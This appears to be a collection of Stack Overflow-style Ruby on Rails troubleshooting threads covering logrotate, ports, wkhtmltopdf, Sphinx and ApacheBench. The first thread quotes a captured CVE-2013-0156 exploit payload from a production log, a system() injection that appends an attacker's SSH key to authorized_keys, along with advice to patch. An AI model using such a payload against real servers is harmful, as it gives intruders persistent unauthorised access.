I noticed some unusual activity on my website a couple of days ago, so I decided to check the production log. Here is what I found:
Started GET "/" for 74.219.112.36 at 2013-01-11 20:25:05 +0000
Processing by HomeController#logo as */*
Parameters: {"exploit"=>#
<ActionDispatch::Routing::RouteSet::NamedRouteCollection:0xcb7e650
#routes={:"foo; system('cd ~;mkdir .ssh;echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV
/l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9p
DjKuymKEVbsJbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzq
TtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')\n__END__\n"=>
#<OpenStruct defaults={:action=>"create", :controller=>"foos"},
required_parts=[], requirements={:action=>"create", :controller=>"foos"},
segment_keys=[:format]>}, #helpers=[:"hash_for_foo; system('cd ~;
mkdir .ssh;echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV
/l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbs
JbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlx
TwyFM= root >> ~/.ssh/authorized_keys')\n__END__\n_url", :"foo;
system('cd ~;mkdir .ssh;echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg
/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG
T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM=
root >> ~/.ssh/authorized_keys')\n__END__\n_url", :"hash_for_foo;
system('cd ~;mkdir .ssh;echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg
/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUt
xCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >>
~/.ssh/authorized_keys')\n__END__\n_path", :"foo; system('cd ~;mkdir .ssh;
echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg
/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG
T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >>
~/.ssh/authorized_keys')\n__END__\n_path"], #module=#<Module:0xcb7e5c4>>}
Rendered landing_users/_form.html.haml (4.7ms)
Rendered home/logo.html.haml within layouts/application (7.8ms)
Completed 200 OK in 11ms (Views: 10.4ms | ActiveRecord: 0.0ms)
I went on to check whether their system calls worked, and sure enough, in ~/.ssh/authorized_keys I found the same SSH key. So this means they were able to run system calls through my Rails app! Thankfully my Rails app isn't run as root, so they did not get root access. But regardless, this terrifies me.
Has anyone encountered this exploit before? If so how did you patch it?
My Rails app is on Ubuntu 12.04, using Rails 3.2.8 and Ruby 1.9.3p125. If any other information would help, please let me know!
I found a blog post referring to this exploit but no solutions, just how to perform it.
Did you follow the link in that blog?
On January 8th, Aaron Patterson announced CVE-2013-0156
If you did, you would see that it is fixed in Rails 3.2.11.
Update your app immediately!
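A minimal sketch of the upgrade, assuming Rails is pinned in your Gemfile:
# Gemfile: move to the patched release line
gem 'rails', '3.2.11'
Then run:
bundle update rails
And since they already planted a key, also remove the injected line from ~/.ssh/authorized_keys and rotate any credentials the app's user could reach.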
I have a Ruby on Rails application running in Docker and would like to rotate my production logs every day. In the spirit of keeping everything self-contained, I would like to keep log rotation inside the container as well. Here's the logrotate configuration in my Docker container:
/etc/logrotate.conf
# rotate log files weekly
weekly
# keep 1 week worth of backlogs
rotate 1
# create new (empty) log files after rotating old ones
create
# use date as a suffix of the rotated file
dateext
# uncomment this if you want your log files compressed
#compress
# packages drop log rotation information into this directory
include /etc/logrotate.d
# system-specific logs may also be configured here.
# Rotate Rails logs
/myapp/log/*.log {
daily
missingok
rotate 7
compress
delaycompress
notifempty
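# copytruncate matters here: Rails keeps its log file handle open, so
# truncate in place instead of moving the file out from under the app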
copytruncate
}
Permissions for /etc/logrotate.conf:
-rw-r--r-- 1 root root 656 Jul 13 02:06 /etc/logrotate.conf
After a day, my log file has not been rotated. I know this isn't an issue with my container being recreated because it's been running for 6 days.
When I go to test it, I get an error message on every line:
> logrotate -d /myapp/log/production.log
...
> error: production.log:56257 unknown option 'I' -- ignoring line
> error: production.log:56258 unknown option 'I' -- ignoring line
> error: production.log:56259 unknown option 'I' -- ignoring line
Here are the permissions on my production.log:
-rw-r--r-- 1 root root 10868754 Jul 14 12:42 /myapp/log/production.log
And when I check what's in the log file, the contents are indeed there:
I, [2022-07-13T02:48:23.666904 #1] INFO -- : Raven 3.1.0 ready to catch errors
I, [2022-07-13T03:00:18.483790 #8] INFO -- : Raven 3.1.0 ready to catch errors
I, [2022-07-13T03:00:34.021416 #22] INFO -- : Started GET "/healthcheck" for xxx.xx.xx.xx at 2022-07-13 03:00:34 +0000
I, [2022-07-13T03:00:34.026047 #22] INFO -- : Processing by HealthcheckController#show as HTML
I, [2022-07-13T03:00:34.027170 #29] INFO -- : Started GET "/healthcheck" for xxx.xx.xx.xx at 2022-07-13 03:00:34 +0000
I, [2022-07-13T03:00:34.031331 #29] INFO -- : Processing by HealthcheckController#show as HTML
I, [2022-07-13T03:00:34.038132 #20] INFO -- : Started GET "/healthcheck" for xxx.xx.xx.xx at 2022-07-13 03:00:34 +0000
I, [2022-07-13T03:00:34.042771 #20] INFO -- : Processing by HealthcheckController#show as HTML
I, [2022-07-13T03:00:34.040177 #20] INFO -- : Started GET "/healthcheck" for xxx.xx.xx.xx at 2022-07-13 03:00:34 +0000
I, [2022-07-13T03:00:34.221546 #20] INFO -- : Processing by HealthcheckController#show as HTML
What can I do to get logrotate to rotate my logs?
Thanks to @β.εηοιτ.βε, I found out that I needed to specify the config file, not the log file, in the logrotate arguments when debugging, like this:
logrotate -d /etc/logrotate.conf
That revealed there was nothing wrong with my configuration. Then I forced a log rotation with:
logrotate -f /etc/logrotate.conf
And it worked! As for why my log file was not rotated after a day, this SO post suggested that cron may not be running in the container, which I found out to be true in my case:
> service cron status
[FAIL] cron is not running ... failed!
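For context: logrotate is not a daemon; on Debian/Ubuntu images it is normally triggered by a daily cron job, so with cron down nothing ever rotates. A rough sketch of the kind of entry that drives it (illustrative, assuming logrotate lives at /usr/sbin/logrotate):
# /etc/cron.d/logrotate: run logrotate once a day against the main config
25 6 * * * root /usr/sbin/logrotate /etc/logrotate.conf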
I updated my Dockerfile's entrypoint to start cron. So it looks like this now:
Dockerfile
...
CMD /bin/bash
ENTRYPOINT [ "./docker/web-entrypoint.sh" ]
docker/web-entrypoint.sh
#!/bin/sh
set -e
if [ -f tmp/pids/server.pid ]; then
  rm tmp/pids/server.pid
fi
service cron start # New line added
bundle exec rails s -b 0.0.0.0 -p 3000
Now it's all working!
I am working on a sample react/rails app based on this.
It was working fine for a few days before this issue arose, and I can't figure out what caused it or how to fix it.
I get this behavior for any port I try to run the web server on.
Commands like this list no processes to kill: lsof -nP -iTCP:3000 | grep LISTEN
This also shows no results: lsof -i tcp:3000
It seems like React starts fine (on 3000), then Rails starts (on 3001), and then there is a collision of some kind that causes everything to shut down.
Here is the Procfile.dev I am using:
web: PORT=3000 yarn --cwd client run start
api: PORT=3001 bundle exec rails s
The react app lives in the /client directory within the rails app.
Here is the proxy line from the react app's package.json: "proxy": "http://localhost:3001/",
Here is the terminal output:
$ bin/rake start
Running via Spring preloader in process 41869
[OKAY] Loaded ENV .env File as KEY=VALUE Format
12:38:45 PM web.1 | yarn run v1.22.4
12:38:45 PM web.1 | $ react-scripts start
12:38:46 PM api.1 | => Booting Puma
12:38:46 PM api.1 | => Rails 6.0.3.1 application starting in development
12:38:46 PM api.1 | => Run `rails server --help` for more startup options
12:38:46 PM web.1 | Something is already running on port 3000.
12:38:46 PM web.1 | Done in 1.06s.
[DONE] Killing all processes with signal SIGINT
12:38:46 PM web.1 Exited Successfully
12:38:46 PM api.1 | Exiting
12:38:46 PM api.1 Exited Successfully
The rake task (lib/tasks/start.rake) is:
namespace :start do
  task :development do
    exec 'heroku local -f Procfile.dev'
  end
end

desc 'Start development server'
task :start => 'start:development'
Thanks for taking a look!
Do export PORT=portNumber (no spaces around the =, and no quotes) just before you run npm start.
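For example (3000 here is just illustrative; use whichever port is free):
export PORT=3000
npm start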
I ended up just wiping the repo and cloning the older version. Now everything works fine; I just lost like a day of work. I think that is good enough for me.
Here's an odd little problem that's led me to post my first question on SO. I am using wkhtmltopdf to convert an HTML document to a PDF as part of a Rails app. To do so, I am rendering the Rails web page to a static HTML file in a temp directory, copying a static header, footer and images to the same temp directory, then executing wkhtmltopdf using "system".
This works perfectly in Development and Test environments. In my Staging env, it does not. I suspected permissions at first, but the first couple of parts of the process (creating the static HTML files and copying them to the directory) are working. I can run wkhtmltopdf from the command line in that temp directory and get the expected outcome. Finally, I ran wkhtmltopdf via both "system" and backticks through the Rails console in the staging environment, and here's what I get as output:
> `wkhtmltopdf --footer-html tmp/invoices/footer.html --header-html tmp/invoices/header.html -s Letter -L 0in -R 0in -T 0.5in -B 1in tmp/invoices/test.html tmp/invoices/this.pdf`
Loading pages (1/6)
QPainter::begin(): Returned false ] 10%
Error: Unable to write to destination
Error: Failed loading page http://tmp/invoices/test.html (sometimes it will work just to ignore this error with --load-error-handling ignore) => ""
Notice that last bit. I'm pointing to local files, but it's looking for them via http. OK, I think, maybe I need to be explicit and feed it the file:// protocol so it doesn't look for http. So I try this:
> system("wkhtmltopdf --footer-html file://Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/footer.html --header-html file://Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/header.html -s Letter -L 0in -R 0in -T 0.5in -B 1in file://Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/test.html file://Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/this.pdf")
Loading pages (1/6)
Error: Failed loading page file://library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/test.html (sometimes it will work just to ignore this error with --load-error-handling ignore)
=> false
Notice that this one fails with a lowercase "l" on Library. What the heck? (And no, it doesn't get any better with the recommendation to ignore the error with that switch.)
Any ideas? Is there a Rails or Ruby setting that would cause system commands to get rewritten? Is there an option I can add to wkhtmltopdf to make sure it loads from a local file? I'm quite baffled. Thanks!
I have had success when using the absolute file path (notice the extra slash after the file://). With only two slashes, the first path segment is parsed as a hostname, which is likely why your "Library" came back lowercased; the third slash leaves the host empty, so the path is treated as local and absolute:
wkhtmltopdf --footer-html file:///Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/footer.html --header-html file:///Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/header.html -s Letter -L 0in -R 0in -T 0.5in -B 1in file:///Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/test.html file:///Library/Server/Web/Data/Sites/intranet-staging/current/tmp/invoices/this.pdf
This is the same on Windows:
Unix path
file:///absolute/path/to/file
Windows path
file:///C:/absolute/path/to/file
In the latest wicked_pdf 0.11 I found one bug.
Example:
C:\Ruby193\lib\ruby\gems\1.9.1\gems\wicked_pdf-0.11.0\lib\wicked_pdf.rb
On line 198 I changed:
options[hf][:html][:url] = "file://#{tf.path}"
to:
options[hf][:html][:url] = "file:///#{tf.path}"
(changed // to ///). After that change, wicked_pdf worked again.
Take a look at the wicked_pdf gem.
You can add a PDF MIME type, and then for whatever page you want PDF'd, just tack a .pdf onto the URL.
I am using this in prod and it works quite well.
No need to call wkhtmltopdf directly.
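A minimal sketch of that setup (the controller, model, and filename here are illustrative, not from your app):
config/initializers/mime_types.rb
# register the PDF MIME type (skip if your Rails version already registers :pdf)
Mime::Type.register "application/pdf", :pdf
app/controllers/invoices_controller.rb
def show
  @invoice = Invoice.find(params[:id])
  respond_to do |format|
    format.html
    format.pdf do
      # wicked_pdf extends render with a :pdf option; no direct wkhtmltopdf call
      render :pdf => "invoice_#{@invoice.id}"
    end
  end
end
With a standard resource route, requesting /invoices/1.pdf then renders the same view through wkhtmltopdf.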
Problem:
I am trying to get Sphinx running again after a server reboot. There seems to be no sphinx.conf file when I try to start it:
>searchd
Sphinx 2.0.4-release (r3135)
Copyright (c) 2001-2012, Andrew Aksyonoff
Copyright (c) 2008-2012, Sphinx Technologies Inc (http://sphinxsearch.com)
FATAL: no readable config file (looked in /etc/sphinxsearch/sphinx.conf, ./sphinx.conf).
I have run:
rake thinking_sphinx:configure
rake thinking_sphinx:index
rake thinking_sphinx:start
The problem is that for some reason no /etc/sphinxsearch/sphinx.conf file is being created... I am new to thinking_sphinx, and this might not be the only problem with the site, but it doesn't seem to be fully set up. For output and more information, read below:
Background info:
I am working on a project I didn't set up initially. We rebooted the server to see some of the changes we made in a constants file, but after the reboot the project no longer displays when you navigate to the site. When you put in the straight IP address, it just says "Welcome to Nginx".
The port is open and working through our hosting server, so I was told I have to restart some services. One of the issues I came upon was with thinking_sphinx. I referenced the rake tasks for Sphinx page, as well as common configuration issues for Sphinx.
I set up the sphinx.yml development paths (we aren't using production). Then I ran
>rake thinking_sphinx:index
which seems to have worked even though it output some warnings:
Generating Configuration to /home/potato/streetpotato/config/development.sphinx.conf
(0.2ms) SELECT @@global.sql_mode, @@session.sql_mode;
Sphinx 2.0.4-release (r3135)
Copyright (c) 2001-2012, Andrew Aksyonoff
Copyright (c) 2008-2012, Sphinx Technologies Inc (http://sphinxsearch.com)
using config file '/home/potato/streetpotato/config/development.sphinx.conf'...
indexing index 'bar_core'...
WARNING: collect_hits: mem_limit=0 kb too low, increasing to 14080 kb
collected 249 docs, 0.0 MB
sorted 0.0 Mhits, 100.0% done
total 249 docs, 32394 bytes
total 0.254 sec, 127298 bytes/sec, 978.49 docs/sec
indexing index 'bar_delta'...
WARNING: collect_hits: mem_limit=0 kb too low, increasing to 14080 kb
collected 0 docs, 0.0 MB
total 0 docs, 0 bytes
total 0.003 sec, 0 bytes/sec, 0.00 docs/sec
skipping non-plain index 'bar'...
indexing index 'synonym_core'...
WARNING: collect_hits: mem_limit=0 kb too low, increasing to 13568 kb
collected 3 docs, 0.0 MB
sorted 0.0 Mhits, 100.0% done
total 3 docs, 103 bytes
total 0.003 sec, 30356 bytes/sec, 884.17 docs/sec
indexing index 'synonym_delta'...
WARNING: collect_hits: mem_limit=0 kb too low, increasing to 13568 kb
collected 0 docs, 0.0 MB
total 0 docs, 0 bytes
total 0.002 sec, 0 bytes/sec, 0.00 docs/sec
skipping non-plain index 'synonym'...
indexing index 'user_core'...
WARNING: collect_hits: mem_limit=0 kb too low, increasing to 13568 kb
collected 100 docs, 0.0 MB
sorted 0.0 Mhits, 100.0% done
total 100 docs, 3146 bytes
total 0.013 sec, 239348 bytes/sec, 7608.03 docs/sec
skipping non-plain index 'user'...
total 11 reads, 0.000 sec, 3.8 kb/call avg, 0.0 msec/call avg
total 37 writes, 0.000 sec, 2.5 kb/call avg, 0.0 msec/call avg
Then I ran
>rake thinking_sphinx:configure
Generating Configuration to /home/potato/streetpotato/config/development.sphinx.conf
(0.2ms) SELECT @@global.sql_mode, @@session.sql_mode;
Lastly running:
>rake thinking_sphinx:start
Started successfully (pid 29623).
Now even though my log says:
[Fri Nov 16 19:34:29.820 2012] [29623] accepting connections
There is still no sphinx.conf file being generated, and when I try to use the searchd command it still gives me the error...
>searchd --stop
Sphinx 2.0.4-release (r3135)
Copyright (c) 2001-2012, Andrew Aksyonoff
Copyright (c) 2008-2012, Sphinx Technologies Inc (http://sphinxsearch.com)
FATAL: no readable config file (looked in /etc/sphinxsearch/sphinx.conf, ./sphinx.conf).
I am at a loss. I know this is super long, but only because I am so lost and trying to give as much information as possible. I got further than I did yesterday, but it still doesn't seem to be fully working. I might have to do more setup with unicorn or thin as well. I'm just trying to figure out how to get the site back up and running again... If anyone has run into similar issues with their site going down after a reboot and got it back up (specifically a Rails project on Nginx and unicorn or thin, using Sphinx), any insight would be appreciated.
Thanks,
Alan
Calm down!! :-)
Firstly, you don't need a /etc/sphinxsearch/sphinx.conf file; that is just the default file that searchd tries to use when you don't specify any configuration file.
As your log output shows, your rails application is using the /home/potato/streetpotato/config/development.sphinx.conf file when it starts the searchd process.
Run ps -fe | grep searchd on your dev machine; you should see something like this as the output:
501 14128 1 0 0:00.00 ttys004 0:00.00 searchd --pidfile --config /home/potato/streetpotato/config/development.sphinx.conf
501 14130 13546 0 0:00.00 ttys004 0:00.01 grep searchd
So the rails app calls searchd with the --config /home/potato/streetpotato/config/development.sphinx.conf argument to specify a different conf file.
From your logs, it is clear that thinking_sphinx is running fine. You can confirm it further by opening the rails console and running a search on one of the models that has thinking_sphinx indexes defined.
E.g., if your app has an Article model as shown in the above link, the following will show all articles containing "National Parks":
$ rails console
> Article.search( "National Parks" )
=> [#<Article id: 15,... >, #<Article id: 22,...>,...]
The real problem is the application not showing up after restarting the server. That has nothing to do with Thinking Sphinx, which is running fine.
Try rolling back all the changes made in the constants file that you mention above, and make sure the application is working fine. Then start making the changes one by one and isolate the one change that breaks your application.
So yeah, this is a hole in ThinkingSphinx (IMHO) -- you can start the searchd server using the various rake tasks (which generate the config as needed) ... but this doesn't work in production.
On a project I worked on last year (running on a Linux server) we created an /etc/init.d script to start searchd -- it takes options, including a path to the configuration file. We did our deploys with capistrano, and put generated code in app/shared -- a directory outside of the source tree. I believe there are some predefined capistrano tasks that will rebuild the Rails-specific config files when models change or otherwise affect what Sphinx does (same as the rake tasks you mention).
This was one of those cases for us where we had been putting off site search for a long time, and one of our developers got it "all set up" in an afternoon. Getting it deployed took a lot more work.
(Just saw the answer from @prakash-murthy -- he provides some details on how to specify the config path when you start searchd. But the trick is to have it start when the system starts, pointing to the config that ThinkingSphinx generates.)
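For reference, a rough sketch of what such a script ends up invoking (the config path is illustrative; point it at wherever your deploys put the generated file):
# start the daemon against the generated config
searchd --config /var/www/myapp/shared/config/production.sphinx.conf
# stop it, using the same config
searchd --config /var/www/myapp/shared/config/production.sphinx.conf --stop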
OK, so after a day and a half I finally set it all up and got it running (it was more than just Sphinx). I also had to get nginx and unicorn up and running in the background, since we didn't have scripts set up to restart them when the server was rebooted...
When rebooting the server you have to restart some services before the app will be accessible:
1) thinking_sphinx
reference sites
http://pat.github.com/ts/en/rake_tasks.html
http://www.claytonlz.com/2010/09/thinkingsphinx-conf-problems/
a)create/modify app/config/sphinx.yml
development:
  morphology: stem_en
  port: 9312
  bin_path: "/usr/bin" # set up the path to binary for searchd
  searchd_binary_name: searchd
  indexer_binary_name: indexer
  #mem_limit: 128M
test:
  morphology: stem_en
  port: 9312
  mem_limit: 128M
production:
  morphology: stem_en
  port: 9312
  mem_limit: 512M
  # the searchd ip, in case it's not on localhost
  # address: 10.10.0.0
  # this is by default included in db/sphinx
  # searchd_file_path: "/path/to/shared/folder/sphinx"
b)rake thinking_sphinx:index
c)rake thinking_sphinx:configure # creates config/development.sphinx.conf which helps define sphinx's indexing
d)# then you have to start sphinx, there are 2 ways to do this
rake thinking_sphinx:start
rake thinking_sphinx:stop
OR
searchd
searchd --stop
# only the rake commands worked for me, when I tried to run searchd
# I got an error FATAL: no readable config file (looked in /etc/sphinxsearch/sphinx.conf, ./sphinx.conf).
# for some reason we dont have a sphinx.conf file, but the rake commands work without it
e)# once you start thinking_sphinx check log/searchd.log file for the line
[Fri Nov 16 19:34:29.820 2012] [29623] accepting connections
2) nginx
reference site:
http://wiki.nginx.org/CommandLine
a) check that nginx is up and running
i) start server
# to check where nginx resides type in this into server console
which nginx
# whatever path it gives you is how you start the server this is my path
/usr/sbin/nginx
ii) stop server
/usr/sbin/nginx -s stop # use the path given by which command
3) unicorn (starting app server)
reference site:
http://codelevy.com/2010/02/09/getting-started-with-unicorn.html
a) test if unicorn will run after previous changes
unicorn_rails -p 3000
# the site should now be up and running, check that it is
# console should now log the different actions you do on the site
b) create unicorn.rb in config folder (if none is there)
# only start this step if the step above got the site running
# close the console or exit the process you started above
# contents of unicorn.rb
worker_processes 2 # (starts 2 child processes, not completely necessary)
preload_app true
timeout 30
listen 3000
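# preload_app loads the app in the master process, so each forked worker
# must re-establish its own database connection: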
after_fork do |server, worker|
  ActiveRecord::Base.establish_connection
end
c) run unicorn in the background
# make sure you exited the process above before running this
unicorn_rails -c config/unicorn.rb -D
# this was giving me an error that it said was logged to stderr
# I got the command to run by adding a prefix that discards stderr
http://stackoverflow.com/questions/2325152/check-for-stdout-or-stderr
exec 2> /dev/null unicorn_rails -c config/unicorn.rb -D
d) (optional) check stats from starting unicorn
i) pgrep -lf unicorn_rails
#sample output
5374 unicorn_rails master -c config/unicorn.rb -D
5388 unicorn_rails worker[0] -c config/unicorn.rb -D # not needed currently
5391 unicorn_rails worker[1] -c config/unicorn.rb -D # not needed currently
ii) cat tmp/pids/unicorn.pid # from inside the streetpotato folder
#sample output
5374
I am trying to use Apache Bench to load test a create action in my Rails application, but ab doesn't appear to be sending the POST data - though it does correctly submit a POST and not a GET request.
This is the command I run:
ab -n 1 -p post -v 4 "http://oz01.zappos.net/registrations"
And this is the contents of the post file:
authenticity_token=M18KXwSOuIVbDPZOVQy5h8aSGoU159V9S5uV2lpsAI0
The Rails logs show a POST request coming through, but don't show any parameters being posted:
Started POST "/registrations" for 10.66.210.70 at Thu Sep 09 17:48:06 -0700 2010
Processing by RegistrationsController#create as */*
Rendered registrations/new.html.erb within layouts/application (14.0ms)
Completed 200 OK in 24ms (Views: 14.6ms | ActiveRecord: 0.1ms)
whereas a POST request coming from a browser results in this log entry:
Started POST "/registrations" for 192.168.66.20 at Thu Sep 09 17:49:47 -0700 2010
Processing by RegistrationsController#create as HTML
Parameters: {"submit"=>"true", "authenticity_token"=>"AfNG0UoTbJXnxke2725efhYAoi3ogddMC7Uqu5mAui0=", "utf8"=>"\342\234\223", "registration"=>{"city"=>"", "address"=>"", "name"=>"", "zip"=>"", "optin"=>"0", "state"=>"", "email"=>""}}
Rendered registrations/new.html.erb within layouts/application (13.7ms)
Completed 200 OK in 24ms (Views: 14.3ms | ActiveRecord: 0.1ms)
And finally, this is what ab logs for the request:
---
POST /registrations HTTP/1.0
User-Agent: ApacheBench/2.0.40-dev
Host: oz01.zappos.net
Accept: */*
Content-length: 63
Content-type: text/plain
---
Why is it not picking up the POST data?
If the "post" file is not there, I get an error message saying it can't find the file, so I know that at the very least it is finding the file...
Maybe you need the -T option, as stated in man ab:
ab -n 1 -p post -v 4 -T application/x-www-form-urlencoded "http://oz01.zappos.net/registrations"
I tested with Django, and it seems that Django doesn't really care about the content-type header (it displayed the POSTed content whether I used -T or not), but Rails may want it.
Old question, but for the sake of anyone else who searches SO for this, here's how I got it to work.
Make EXTRA sure your post file is properly URL-encoded, with no extra non-printing characters or anything at the end. The most error-free way is just to create it with code. I used some Python to create mine:
>>> import urllib
>>> outfile = open('post.data', 'w')
>>> params = ({ 'auth_token': 'somelongstringthatendswithanequalssign=' })
>>> encoded = urllib.urlencode(params)
>>> outfile.write(encoded)
>>> outfile.close()
Example output:
auth_token=somelongstringthatendswithanequalssign%3D
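With that file in place, the earlier command should pick up the parameters (host and route from the question above; post.data is the file the snippet just wrote):
ab -n 1 -p post.data -T application/x-www-form-urlencoded -v 4 "http://oz01.zappos.net/registrations"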